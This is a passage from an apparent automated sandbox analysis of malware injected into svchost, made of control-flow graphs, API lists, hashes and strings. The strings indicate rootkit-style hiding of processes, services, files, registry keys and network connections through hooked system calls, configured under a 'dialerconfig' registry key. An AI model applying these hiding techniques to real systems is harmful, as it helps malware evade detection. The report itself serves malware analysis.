                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                • Instruction ID: f79c5404dba2c7bcefd76c4e133409882d967ce8ed856d3d4bdd2f0356d62ee4
                                                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                • Instruction Fuzzy Hash: EB710036B20A508BEB90DF69EC5865D67A4F7A7B88F441121EE4D8BF68EF34C644C341

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                • Instruction ID: ad3bb7409650a392eb3da378421f2964571fa5578442e1310fd7327ca73c4980
                                                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                • Instruction Fuzzy Hash: 9F111561F306618BF7A1D729AE0E75D62D1EBBB308F440039BA16C9994FF3DC2488602

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 000002A3F0661650: GetProcessHeap.KERNEL32 ref: 000002A3F066165B
                                                                                  • Part of subcall function 000002A3F0661650: HeapAlloc.KERNEL32 ref: 000002A3F066166A
                                                                                  • Part of subcall function 000002A3F0661650: RegOpenKeyExW.ADVAPI32 ref: 000002A3F06616DA
                                                                                  • Part of subcall function 000002A3F0661650: RegOpenKeyExW.ADVAPI32 ref: 000002A3F0661707
                                                                                  • Part of subcall function 000002A3F0661650: RegCloseKey.ADVAPI32 ref: 000002A3F0661721
                                                                                  • Part of subcall function 000002A3F0661650: RegOpenKeyExW.ADVAPI32 ref: 000002A3F0661741
                                                                                  • Part of subcall function 000002A3F0661650: RegCloseKey.ADVAPI32 ref: 000002A3F066175C
                                                                                  • Part of subcall function 000002A3F0661650: RegOpenKeyExW.ADVAPI32 ref: 000002A3F066177C
                                                                                  • Part of subcall function 000002A3F0661650: RegCloseKey.ADVAPI32 ref: 000002A3F0661797
                                                                                  • Part of subcall function 000002A3F0661650: RegOpenKeyExW.ADVAPI32 ref: 000002A3F06617B7
                                                                                  • Part of subcall function 000002A3F0661650: RegCloseKey.ADVAPI32 ref: 000002A3F06617D2
                                                                                  • Part of subcall function 000002A3F0661650: RegOpenKeyExW.ADVAPI32 ref: 000002A3F06617F2
                                                                                • Sleep.KERNEL32 ref: 000002A3F0661C43
                                                                                • SleepEx.KERNELBASE ref: 000002A3F0661C49
                                                                                  • Part of subcall function 000002A3F0661650: RegCloseKey.ADVAPI32 ref: 000002A3F066180D
                                                                                  • Part of subcall function 000002A3F0661650: RegOpenKeyExW.ADVAPI32 ref: 000002A3F066182D
                                                                                  • Part of subcall function 000002A3F0661650: RegCloseKey.ADVAPI32 ref: 000002A3F0661848
                                                                                  • Part of subcall function 000002A3F0661650: RegOpenKeyExW.ADVAPI32 ref: 000002A3F0661868
                                                                                  • Part of subcall function 000002A3F0661650: RegCloseKey.ADVAPI32 ref: 000002A3F0661883
                                                                                  • Part of subcall function 000002A3F0661650: RegOpenKeyExW.ADVAPI32 ref: 000002A3F06618A3
                                                                                  • Part of subcall function 000002A3F0661650: RegCloseKey.ADVAPI32 ref: 000002A3F06618BE
                                                                                  • Part of subcall function 000002A3F0661650: RegCloseKey.ADVAPI32 ref: 000002A3F06618C8
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                • Instruction ID: afe1bd0adbe0fdb1014eaf2c2c977f5ae0a942446c788d3fc9d3ad709c21c3e3
                                                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                • Instruction Fuzzy Hash: EE31DF65B206019BFAD0DF2ADE5935D1295EB67BC5F0C4031BE09CFE96FE34CA508292

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 110 2a3effc2908-2a3effc2973 call 2a3effc0f34 * 4 119 2a3effc2b8b 110->119 120 2a3effc2979-2a3effc297c 110->120 121 2a3effc2b8d-2a3effc2ba9 119->121 120->119 122 2a3effc2982-2a3effc2985 120->122 122->119 123 2a3effc298b-2a3effc298e 122->123 123->119 124 2a3effc2994-2a3effc29b2 123->124 124->119 126 2a3effc29b8-2a3effc29dc call 2a3effc0d6c 124->126 129 2a3effc2a0b-2a3effc2a12 126->129 130 2a3effc29de-2a3effc2a09 call 2a3effc0d6c 126->130 132 2a3effc2ab2-2a3effc2ab9 129->132 133 2a3effc2a18-2a3effc2a25 129->133 130->129 134 2a3effc2abf-2a3effc2ad6 132->134 135 2a3effc2b6c-2a3effc2b89 132->135 133->132 137 2a3effc2a2b-2a3effc2a39 LoadLibraryA 133->137 134->135 138 2a3effc2adc 134->138 135->121 139 2a3effc2a3b-2a3effc2a45 137->139 140 2a3effc2a9d-2a3effc2aa5 137->140 143 2a3effc2ae2-2a3effc2af7 138->143 144 2a3effc2a48-2a3effc2a4c 139->144 140->137 141 2a3effc2aa7-2a3effc2aac 140->141 141->132 145 2a3effc2b5b-2a3effc2b66 143->145 146 2a3effc2af9-2a3effc2b0a 143->146 147 2a3effc2a4e-2a3effc2a52 144->147 148 2a3effc2a9a 144->148 145->135 145->143 150 2a3effc2b0c-2a3effc2b13 146->150 151 2a3effc2b15-2a3effc2b19 146->151 152 2a3effc2a7d-2a3effc2a87 147->152 153 2a3effc2a54-2a3effc2a7b 147->153 148->140 154 2a3effc2b48-2a3effc2b59 150->154 155 2a3effc2b1b-2a3effc2b22 151->155 156 2a3effc2b24-2a3effc2b28 151->156 157 2a3effc2a8d-2a3effc2a98 152->157 153->157 154->145 154->146 155->154 158 2a3effc2b3a-2a3effc2b3e 156->158 159 2a3effc2b2a-2a3effc2b38 156->159 157->144 158->154 160 2a3effc2b40-2a3effc2b43 158->160 159->154 160->154
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2679417538.000002A3EFFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3EFFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3effc0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                • Instruction ID: cefa9eae0214541e315f9d9b4dfc71c09d09727c694922c7fd46a5f5038a8511
                                                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                • Instruction Fuzzy Hash: 6861333270126187EB68CF15D64876CB391FF85B94F148023EA1987795DF78EA53C70A

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 213 2a3f0662cdc-2a3f0662d55 call 2a3f067ecc0 216 2a3f0663090-2a3f06630b3 213->216 217 2a3f0662d5b-2a3f0662d61 213->217 217->216 218 2a3f0662d67-2a3f0662d6a 217->218 218->216 219 2a3f0662d70-2a3f0662d73 218->219 219->216 220 2a3f0662d79-2a3f0662d89 GetModuleHandleA 219->220 221 2a3f0662d9d 220->221 222 2a3f0662d8b-2a3f0662d9b GetProcAddress 220->222 223 2a3f0662da0-2a3f0662dbe 221->223 222->223 223->216 225 2a3f0662dc4-2a3f0662de3 StrCmpNIW 223->225 225->216 226 2a3f0662de9-2a3f0662ded 225->226 226->216 227 2a3f0662df3-2a3f0662dfd 226->227 227->216 228 2a3f0662e03-2a3f0662e0a 227->228 228->216 229 2a3f0662e10-2a3f0662e23 228->229 230 2a3f0662e25-2a3f0662e31 229->230 231 2a3f0662e33 229->231 232 2a3f0662e36-2a3f0662e3a 230->232 231->232 233 2a3f0662e4a 232->233 234 2a3f0662e3c-2a3f0662e48 232->234 235 2a3f0662e4d-2a3f0662e57 233->235 234->235 236 2a3f0662f4d-2a3f0662f51 235->236 237 2a3f0662e5d-2a3f0662e60 235->237 238 2a3f0662f57-2a3f0662f5a 236->238 239 2a3f0663082-2a3f066308a 236->239 240 2a3f0662e72-2a3f0662e7c 237->240 241 2a3f0662e62-2a3f0662e6f call 2a3f0661a14 237->241 242 2a3f0662f6b-2a3f0662f75 238->242 243 2a3f0662f5c-2a3f0662f68 call 2a3f0661a14 238->243 239->216 239->229 245 2a3f0662eb0-2a3f0662eba 240->245 246 2a3f0662e7e-2a3f0662e8b 240->246 241->240 248 2a3f0662f77-2a3f0662f84 242->248 249 2a3f0662fa5-2a3f0662fa8 242->249 243->242 252 2a3f0662eea-2a3f0662eed 245->252 253 2a3f0662ebc-2a3f0662ec9 245->253 246->245 251 2a3f0662e8d-2a3f0662e9a 246->251 248->249 257 2a3f0662f86-2a3f0662f93 248->257 258 2a3f0662faa-2a3f0662fb3 call 2a3f0661d28 249->258 259 2a3f0662fb5-2a3f0662fc2 lstrlenW 249->259 260 2a3f0662e9d-2a3f0662ea3 251->260 255 2a3f0662eef-2a3f0662ef9 call 2a3f0661d28 252->255 256 2a3f0662efb-2a3f0662f08 lstrlenW 252->256 253->252 261 2a3f0662ecb-2a3f0662ed8 253->261 255->256 269 2a3f0662f43-2a3f0662f48 255->269 264 2a3f0662f0a-2a3f0662f14 256->264 265 2a3f0662f2b-2a3f0662f3d call 2a3f0663930 256->265 266 2a3f0662f96-2a3f0662f9c 257->266 258->259 276 2a3f0662ffa-2a3f0663005 258->276 270 2a3f0662fe5-2a3f0662fef call 2a3f0663930 259->270 271 2a3f0662fc4-2a3f0662fce 259->271 268 2a3f0662ea9-2a3f0662eae 260->268 260->269 262 2a3f0662edb-2a3f0662ee1 261->262 262->269 272 2a3f0662ee3-2a3f0662ee8 262->272 264->265 275 2a3f0662f16-2a3f0662f29 call 2a3f0661554 264->275 265->269 280 2a3f0662ff2-2a3f0662ff4 265->280 266->276 277 2a3f0662f9e-2a3f0662fa3 266->277 268->245 268->260 269->280 270->280 271->270 281 2a3f0662fd0-2a3f0662fe3 call 2a3f0661554 271->281 272->252 272->262 275->265 275->269 284 2a3f0663007-2a3f066300b 276->284 285 2a3f066307c-2a3f0663080 276->285 277->249 277->266 280->239 280->276 281->270 281->276 289 2a3f0663013-2a3f066302d call 2a3f06686a0 284->289 290 2a3f066300d-2a3f0663011 284->290 285->239 292 2a3f0663030-2a3f0663033 289->292 290->289 290->292 295 2a3f0663035-2a3f0663053 call 2a3f06686a0 292->295 296 2a3f0663056-2a3f0663059 292->296 295->296 296->285 297 2a3f066305b-2a3f0663079 call 2a3f06686a0 296->297 297->285
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                • Instruction ID: 33aced8475daf3e94686e5112e81de38feec59a113ea034f96cd00b206f4b55a
                                                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                • Instruction Fuzzy Hash: 38B18022B20A518BEB94CF29C94879D63A4F767B88F445036FE099BF94FE35CA44C341

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                • Instruction ID: 6cb2840dcff15ca21440fafa695f21f01824cfde566a05628f86f002d40ceb9b
                                                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                • Instruction Fuzzy Hash: 39315D72714B808AEBA0CF64E8547ED73A0F796744F44442AEA4D87B99EF38C648C711
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                • Instruction ID: fa72f90d328a0edf74a53976890cb7dbdf4481ab8c5f52fb664a1e7f445233cf
                                                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                • Instruction Fuzzy Hash: E6315E32724B808ADBA0CF29E85439E73A4F79A754F500126EA9D87B95EF38C6458B01
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                • String ID:
                                                                                • API String ID: 1443284424-0
                                                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                • Instruction ID: cce8f234377bda62cc7a1b4833b5512b5b5e5b4352741d0832b44603d9de0214
                                                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                • Instruction Fuzzy Hash: D9E1CE32B24A809FE740CF68D88829D7BB1F357798F544126EE4A97F99EE34C616C701

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                • Instruction ID: ef86474c76c9eaad6ed299eb49a50b885eaf0495ca8c34782cc922886f71be1a
                                                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                • Instruction Fuzzy Hash: 5A518E72B24B54DBEB50CF66E94839E73A1F39AB80F444124EA498BF14EF38C255C701

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                • Instruction ID: fdb238a54c89558d093bdf46e3e69f66396052a159244fc8cdbab1230f8c34ff
                                                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                • Instruction Fuzzy Hash: 7531B664F30906ABEBC5DF6CEC596D86321E7A7348F804533B6198A961FE38834DC342

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                • Instruction ID: 6fa9dacab57973bc72e64f5d1220d71cc686db30aba163a0f73692ec307a740b
                                                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                • Instruction Fuzzy Hash: 85214435B24B5187F750CB29E94835973A0F39BB95F504225FA5946FA8EF3CC249CB02

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                • Instruction ID: 4419e75e1351a038130aef3a1dcd23f1e7ba0082e54820062e16b886cd712548
                                                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                • Instruction Fuzzy Hash: DD417133614B809BE7A0CF55E94439EB7A1F396784F048125EB894BF54EF38C254CB01

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 436 2a3f06675f0-2a3f06675f6 437 2a3f06675f8-2a3f06675fb 436->437 438 2a3f0667631-2a3f066763b 436->438 440 2a3f0667625-2a3f0667664 call 2a3f0667ca0 437->440 441 2a3f06675fd-2a3f0667600 437->441 439 2a3f0667758-2a3f066776d 438->439 445 2a3f066776f 439->445 446 2a3f066777c-2a3f0667796 call 2a3f0667b34 439->446 456 2a3f066766a-2a3f066767f call 2a3f0667b34 440->456 457 2a3f0667732 440->457 443 2a3f0667618 __scrt_dllmain_crt_thread_attach 441->443 444 2a3f0667602-2a3f0667605 441->444 452 2a3f066761d-2a3f0667624 443->452 448 2a3f0667607-2a3f0667610 444->448 449 2a3f0667611-2a3f0667616 call 2a3f0667be4 444->449 450 2a3f0667771-2a3f066777b 445->450 459 2a3f0667798-2a3f06677cd call 2a3f0667c5c call 2a3f0667afc call 2a3f0667ff8 call 2a3f0667e10 call 2a3f0667e34 call 2a3f0667c8c 446->459 460 2a3f06677cf-2a3f0667800 call 2a3f0667e70 446->460 449->452 469 2a3f066774a-2a3f0667757 call 2a3f0667e70 456->469 470 2a3f0667685-2a3f0667696 call 2a3f0667ba4 456->470 461 2a3f0667734-2a3f0667749 457->461 459->450 471 2a3f0667811-2a3f0667817 460->471 472 2a3f0667802-2a3f0667808 460->472 469->439 489 2a3f06676e7-2a3f06676f1 call 2a3f0667e10 470->489 490 2a3f0667698-2a3f06676bc call 2a3f0667fbc call 2a3f0667aec call 2a3f0667b18 call 2a3f0669cdc 470->490 473 2a3f0667819-2a3f0667823 471->473 474 2a3f066785e-2a3f0667874 call 2a3f0663458 471->474 472->471 478 2a3f066780a-2a3f066780c 472->478 480 2a3f0667825-2a3f066782d 473->480 481 2a3f066782f-2a3f066783d call 2a3f0673358 473->481 497 2a3f0667876-2a3f0667878 474->497 498 2a3f06678ac-2a3f06678ae 474->498 479 2a3f06678ff-2a3f066790c 478->479 486 2a3f0667843-2a3f0667858 call 2a3f06675f0 480->486 481->486 501 2a3f06678f5-2a3f06678fd 481->501 486->474 486->501 489->457 509 2a3f06676f3-2a3f06676ff call 2a3f0667e60 489->509 490->489 539 2a3f06676be-2a3f06676c5 __scrt_dllmain_after_initialize_c 490->539 497->498 506 2a3f066787a-2a3f066789c call 2a3f0663458 call 2a3f0667758 497->506 499 2a3f06678b5-2a3f06678ca call 2a3f06675f0 498->499 500 2a3f06678b0-2a3f06678b3 498->500 499->501 519 2a3f06678cc-2a3f06678d6 499->519 500->499 500->501 501->479 506->498 531 2a3f066789e-2a3f06678a6 call 2a3f0673358 506->531 528 2a3f0667725-2a3f0667730 509->528 529 2a3f0667701-2a3f066770b call 2a3f0667d78 509->529 525 2a3f06678d8-2a3f06678df 519->525 526 2a3f06678e1-2a3f06678f1 call 2a3f0673358 519->526 525->501 526->501 528->461 529->528 538 2a3f066770d-2a3f066771b 529->538 531->498 538->528 539->489 540 2a3f06676c7-2a3f06676e4 call 2a3f0669c78 539->540 540->489
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction ID: f42c7398ba66d7474313c3f98108a33ba553a3a7ed970e6ddeff39ad48e1ecd8
                                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction Fuzzy Hash: 09815B21F346418FFAF0DB2D9C6935D2690E7A7780F144539BA05CBE96FE38CA458702

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 329 2a3effc69f0-2a3effc69f6 330 2a3effc6a31-2a3effc6a3b 329->330 331 2a3effc69f8-2a3effc69fb 329->331 332 2a3effc6b58-2a3effc6b6d 330->332 333 2a3effc69fd-2a3effc6a00 331->333 334 2a3effc6a25-2a3effc6a64 call 2a3effc70a0 331->334 338 2a3effc6b6f 332->338 339 2a3effc6b7c-2a3effc6b96 call 2a3effc6f34 332->339 336 2a3effc6a02-2a3effc6a05 333->336 337 2a3effc6a18 __scrt_dllmain_crt_thread_attach 333->337 352 2a3effc6b32 334->352 353 2a3effc6a6a-2a3effc6a7f call 2a3effc6f34 334->353 343 2a3effc6a11-2a3effc6a16 call 2a3effc6fe4 336->343 344 2a3effc6a07-2a3effc6a10 336->344 341 2a3effc6a1d-2a3effc6a24 337->341 345 2a3effc6b71-2a3effc6b7b 338->345 350 2a3effc6bcf-2a3effc6c00 call 2a3effc7270 339->350 351 2a3effc6b98-2a3effc6bcd call 2a3effc705c call 2a3effc6efc call 2a3effc73f8 call 2a3effc7210 call 2a3effc7234 call 2a3effc708c 339->351 343->341 361 2a3effc6c11-2a3effc6c17 350->361 362 2a3effc6c02-2a3effc6c08 350->362 351->345 356 2a3effc6b34-2a3effc6b49 352->356 364 2a3effc6b4a-2a3effc6b57 call 2a3effc7270 353->364 365 2a3effc6a85-2a3effc6a96 call 2a3effc6fa4 353->365 367 2a3effc6c5e-2a3effc6c74 call 2a3effc2858 361->367 368 2a3effc6c19-2a3effc6c23 361->368 362->361 366 2a3effc6c0a-2a3effc6c0c 362->366 364->332 382 2a3effc6ae7-2a3effc6af1 call 2a3effc7210 365->382 383 2a3effc6a98-2a3effc6abc call 2a3effc73bc call 2a3effc6eec call 2a3effc6f18 call 2a3effc90dc 365->383 372 2a3effc6cff-2a3effc6d0c 366->372 385 2a3effc6cac-2a3effc6cae 367->385 386 2a3effc6c76-2a3effc6c78 367->386 373 2a3effc6c2f-2a3effc6c3d call 2a3effd2758 368->373 374 2a3effc6c25-2a3effc6c2d 368->374 379 2a3effc6c43-2a3effc6c58 call 2a3effc69f0 373->379 396 2a3effc6cf5-2a3effc6cfd 373->396 374->379 379->367 379->396 382->352 405 2a3effc6af3-2a3effc6aff call 2a3effc7260 382->405 383->382 432 2a3effc6abe-2a3effc6ac5 __scrt_dllmain_after_initialize_c 383->432 394 2a3effc6cb0-2a3effc6cb3 385->394 395 2a3effc6cb5-2a3effc6cca call 2a3effc69f0 385->395 386->385 393 2a3effc6c7a-2a3effc6c9c call 2a3effc2858 call 2a3effc6b58 386->393 393->385 426 2a3effc6c9e-2a3effc6ca6 call 2a3effd2758 393->426 394->395 394->396 395->396 414 2a3effc6ccc-2a3effc6cd6 395->414 396->372 416 2a3effc6b01-2a3effc6b0b call 2a3effc7178 405->416 417 2a3effc6b25-2a3effc6b30 405->417 420 2a3effc6ce1-2a3effc6cf1 call 2a3effd2758 414->420 421 2a3effc6cd8-2a3effc6cdf 414->421 416->417 431 2a3effc6b0d-2a3effc6b1b 416->431 417->356 420->396 421->396 426->385 431->417 432->382 433 2a3effc6ac7-2a3effc6ae4 call 2a3effc9078 432->433 433->382
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2679417538.000002A3EFFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3EFFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3effc0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction ID: 2004662af8488afb19c7b9257792f61ce78e7f6546aa9166802e95a8c65f0e85
                                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction Fuzzy Hash: 1981BE61B0826187FB60EB259B493996290EF87780F444127BA0DD3796DFF9CB47870B

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
